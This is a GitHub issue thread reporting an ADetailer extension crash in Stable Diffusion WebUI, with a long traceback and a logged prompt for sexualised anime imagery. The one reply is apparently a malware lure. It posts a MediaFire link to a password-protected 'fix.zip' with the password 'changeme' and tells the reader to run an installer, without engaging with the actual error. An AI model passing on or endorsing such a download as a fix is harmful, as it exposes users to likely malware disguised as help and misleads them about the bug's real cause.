### ISSUE TITLE
ERROR no working adetailer

### ISSUE THREAD

**Issue by Krek12** [rmcc3/experiments-progressive-growing#5]
0: 640x640 1 face, 6.1ms
Speed: 15.0ms preprocess, 6.1ms inference, 74.6ms postprocess per image at shape (1, 3, 640, 640)
*** Error running postprocess_image: /home/studio-lab-user/asd/extensions/adetailer/scripts/!adetailer.py
    Traceback (most recent call last):
      File "/home/studio-lab-user/asd/modules/scripts.py", line 912, in postprocess_image
        script.postprocess_image(p, pp, *script_args)
      File "/home/studio-lab-user/asd/extensions/adetailer/aaaaaa/traceback.py", line 173, in wrapper
        raise error from None
    AttributeError: 
    ╭──────────────────────────────────────────────────────────────────────────╮
    │                               System info                                │
    │ ┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ │
    │ ┃             ┃ Value                                                  ┃ │
    │ ┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩ │
    │ │    Platform │ Linux-5.10.223-212.873.amzn2.x86_64-x86_64-with-glibc… │ │
    │ │      Python │ 3.10.13 | packaged by conda-forge | (main, Dec 23      │ │
    │ │             │ 2023, 15:36:39) [GCC 12.3.0]                           │ │
    │ │     Version │ 1.10.1                                                 │ │
    │ │      Commit │ 82a973c04367123ae98bd9abdf80d9eda9b910e2               │ │
    │ │ Commandline │ ['launch.py', '--xformers',                            │ │
    │ │             │ '--enable-insecure-extension-access',                  │ │
    │ │             │ '--disable-console-progressbars', '--theme', 'dark',   │ │
    │ │             │ '--skip-torch-cuda-test']                              │ │
    │ │   Libraries │ {'torch': '2.3.1+cu121', 'torchvision':                │ │
    │ │             │ '0.18.1+cu121', 'ultralytics': '8.2.35', 'mediapipe':  │ │
    │ │             │ '0.10.14'}                                             │ │
    │ └─────────────┴────────────────────────────────────────────────────────┘ │
    │                                  Inputs                                  │
    │ ┏━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ │
    │ ┃                 ┃ Value                                              ┃ │
    │ ┡━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩ │
    │ │          prompt │ score_9,score_8_up,core_7_up,                      │ │
    │ │                 │ <lora:one_breast_out_pdxl_goofy:1> 1girl, solo,    │ │
    │ │                 │ smile, blush, teeth, purple eyes, braid, bangs,    │ │
    │ │                 │ looking at viewer, long hair, blunt bangs, purple  │ │
    │ │                 │ hair, grin, one breast out, upper body,            │ │
    │ │ negative_prompt │ score_5, score_4, source_pony, monochrome,         │ │
    │ │                 │ greyscale, signature, text, watermark, ipstick,    │ │
    │ │                 │ monochrome, female abs, muscular female,           │ │
    │ │                 │ duplicate, twins                                   │ │
    │ │          n_iter │ 1                                                  │ │
    │ │      batch_size │ 1                                                  │ │
    │ │           width │ 512                                                │ │
    │ │          height │ 512                                                │ │
    │ │    sampler_name │ DPM++ 2M                                           │ │
    │ │       enable_hr │ False                                              │ │
    │ │     hr_upscaler │ Latent                                             │ │
    │ │      checkpoint │ animeConfettiComrade_v3.safetensors [7042d25e47]   │ │
    │ │             vae │ XL_VAE_F1.safetensors                              │ │
    │ │            unet │ Automatic                                          │ │
    │ └─────────────────┴────────────────────────────────────────────────────┘ │
    │                 ADetailer                                                │
    │ ┏━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┓                                │
    │ ┃                     ┃ Value           ┃                                │
    │ ┡━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━┩                                │
    │ │             version │ 24.9.0-dev.0    │                                │
    │ │            ad_model │ face_yolov8n.pt │                                │
    │ │           ad_prompt │                 │                                │
    │ │  ad_negative_prompt │                 │                                │
    │ │ ad_controlnet_model │ None            │                                │
    │ │              is_api │ False           │                                │
    │ └─────────────────────┴─────────────────┘                                │
    │ ╭───────────────── Traceback (most recent call last) ──────────────────╮ │
    │ │ /home/studio-lab-user/asd/extensions/adetailer/aaaaaa/traceback.py:1 │ │
    │ │ 53 in wrapper                                                        │ │
    │ │                                                                      │ │
    │ │   152 │   │   try:                                                   │ │
    │ │ ❱ 153 │   │   │   return func(*args, **kwargs)                       │ │
    │ │   154 │   │   except Exception as e:                                 │ │
    │ │                                                                      │ │
    │ │ /home/studio-lab-user/asd/extensions/adetailer/scripts/!adetailer.py │ │
    │ │ :908 in postprocess_image                                            │ │
    │ │                                                                      │ │
    │ │    907 │   │   │   │   │   continue                                  │ │
    │ │ ❱  908 │   │   │   │   is_processed |= self._postprocess_image_inner │ │
    │ │    909                                                               │ │
    │ │                                                                      │ │
    │ │ /home/studio-lab-user/asd/extensions/adetailer/scripts/!adetailer.py │ │
    │ │ :865 in _postprocess_image_inner                                     │ │
    │ │                                                                      │ │
    │ │    864 │   │   │   try:                                              │ │
    │ │ ❱  865 │   │   │   │   processed = process_images(p2)                │ │
    │ │    866 │   │   │   except NansException as e:                        │ │
    │ │                                                                      │ │
    │ │ /home/studio-lab-user/asd/modules/processing.py:852 in               │ │
    │ │ process_images                                                       │ │
    │ │                                                                      │ │
    │ │    851 │   │   with profiling.Profiler():                            │ │
    │ │ ❱  852 │   │   │   res = process_images_inner(p)                     │ │
    │ │    853                                                               │ │
    │ │                                                                      │ │
    │ │ /home/studio-lab-user/asd/modules/processing.py:982 in               │ │
    │ │ process_images_inner                                                 │ │
    │ │                                                                      │ │
    │ │    981 │   │   │   │   │   processed = Processed(p, [])              │ │
    │ │ ❱  982 │   │   │   │   │   file.write(processed.infotext(p, 0))      │ │
    │ │    983                                                               │ │
    │ │                                                                      │ │
    │ │ /home/studio-lab-user/asd/modules/processing.py:610 in infotext      │ │
    │ │                                                                      │ │
    │ │    609 │   def infotext(self, p: StableDiffusionProcessing, index):  │ │
    │ │ ❱  610 │   │   return create_infotext(p, self.all_prompts, self.all_ │ │
    │ │    611                                                               │ │
    │ │                                                                      │ │
    │ │ /home/studio-lab-user/asd/extensions/sd-webui-hires-fix-tweaks/hires │ │
    │ │ _fix_tweaks/hr_modules/hr_batch_seed.py:77 in wrapped_function       │ │
    │ │                                                                      │ │
    │ │    76 │   │   finally:                                               │ │
    │ │ ❱  77 │   │   │   results = create_infotext(*args, **kwargs)         │ │
    │ │    78 │   │   │   return results                                     │ │
    │ │                                                                      │ │
    │ │ /home/studio-lab-user/asd/modules/processing.py:797 in               │ │
    │ │ create_infotext                                                      │ │
    │ │                                                                      │ │
    │ │    796 │   │   "Tiling": "True" if p.tiling else None,               │ │
    │ │ ❱  797 │   │   "Progressive Growing": "True" if p.enable_progressive │ │
    │ │    798 │   │   "Min Scale": p.progressive_growing_min_scale if p.ena │ │
    │ ╰──────────────────────────────────────────────────────────────────────╯ │
    │ AttributeError: 'StableDiffusionProcessingImg2Img' object has no         │
    │ attribute 'enable_progressive_growing'                                   │
    ╰──────────────────────────────────────────────────────────────────────────╯

---

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
